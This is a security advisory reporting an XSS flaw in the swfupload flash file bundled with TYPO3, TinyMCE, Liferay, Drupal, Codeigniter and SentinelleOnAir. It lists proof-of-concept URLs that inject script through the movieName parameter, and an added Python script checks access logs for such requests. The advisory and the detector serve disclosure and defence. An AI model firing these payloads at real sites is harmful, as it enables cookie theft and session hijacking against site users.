Securityvulns: SECURITYVULNS:DOC:28823
Dec 10, 2012 - 12:00 a.m.

XSS vulnerability in swfupload in TYPO3 CMS, TinyMCE, Liferay Portal, Drupal, Codeigniter, SentinelleOnAir


Hello 3APA3A!

I will draw your attention to an XSS vulnerability in other web applications with swfupload. This is the final advisory concerning different versions of this flash application. Earlier I've written about swfupload in Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available in many other web applications.

In previous letters I've written concerning web applications with swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash Player 8, 9 and 10). And now I'll write about web applications with swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and 11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which was earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir - among multiple web applications which are bundled with swfupload_f10.swf or swfupload_f11.swf.


Affected products:

Potentially vulnerable are all versions of SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which was earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir. There is no information that they have fixed this vulnerability in their software (while this vulnerability was fixed in WordPress 3.3.2 on 20.04.2012).

The developers of WordPress released a new version of the flash file (as did the developers of XenForo), which could be used by all web developers who were using swfupload.


Details:

XSS (WASC-08):

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides the earlier described swfupload_f9.swf and swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f10.swf, besides the earlier described swfupload_f9.swf and swfupload_f8.swf.

Swfupload for Drupal:

As can be seen from the project http://code.google.com/p/drupal-swfupload/, there is a version of Swfupload for Drupal. But in this exact project there are no files. They are in the project Respectiva (http://code.google.com/p/respectiva/), which is Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

This is concerning swfupload_f10.swf. As for swfupload_f11.swf, in Google's index there is only one project - SentinelleOnAir - which contains swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
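
Added example (not part of the original advisory): a log check that flags requests to bundled swfupload SWF files whose movieName parameter is not a plain identifier, as in the URLs listed above. The access-log format, the sample lines and the allowed character set for movieName are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# File names seen in the advisory: swfupload.swf, swfupload_f8.swf ... swfupload_f11.swf,
# and the unprefixed variants such as swfupload10.swf.
SWF_NAME = re.compile(r"/swfupload(?:_f)?\d*\.swf$", re.IGNORECASE)
# Assumption: a legitimate movieName is a simple identifier such as "SWFUpload_0".
SAFE_MOVIE_NAME = re.compile(r"^[A-Za-z0-9_.\-]*$")
# Request line of a common/combined format access log (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, paths taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2012:10:00:01 +0000] "GET /html/js/misc/swfupload/'
    'swfupload_f10.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12345',
    '192.0.2.44 - - [10/Dec/2012:10:02:17 +0000] "GET /html/js/misc/swfupload/'
    'swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert'
    '(document.cookie);// HTTP/1.1" 200 12345',
    '192.0.2.10 - - [10/Dec/2012:10:03:40 +0000] "GET /index.php?movieName=%22] '
    'HTTP/1.1" 200 512',
]

def suspicious_swfupload_requests(log_lines):
    """Return (path, decoded movieName) for swfupload requests with a non-identifier movieName."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not SWF_NAME.search(url.path):
            continue  # not one of the bundled swfupload flash files
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        for key, values in params.items():
            if key.lower() != "moviename":
                continue
            for value in values:
                if not SAFE_MOVIE_NAME.match(value):
                    hits.append((url.path, value))
    return hits

if __name__ == "__main__":
    for path, value in suspicious_swfupload_requests(SAMPLE_LOG):
        print(f"suspicious movieName for {path}: {value!r}")
```

The same SWF_NAME pattern can be reused to inventory a web root for bundled copies of the flash file that still need replacing with the fixed version mentioned above.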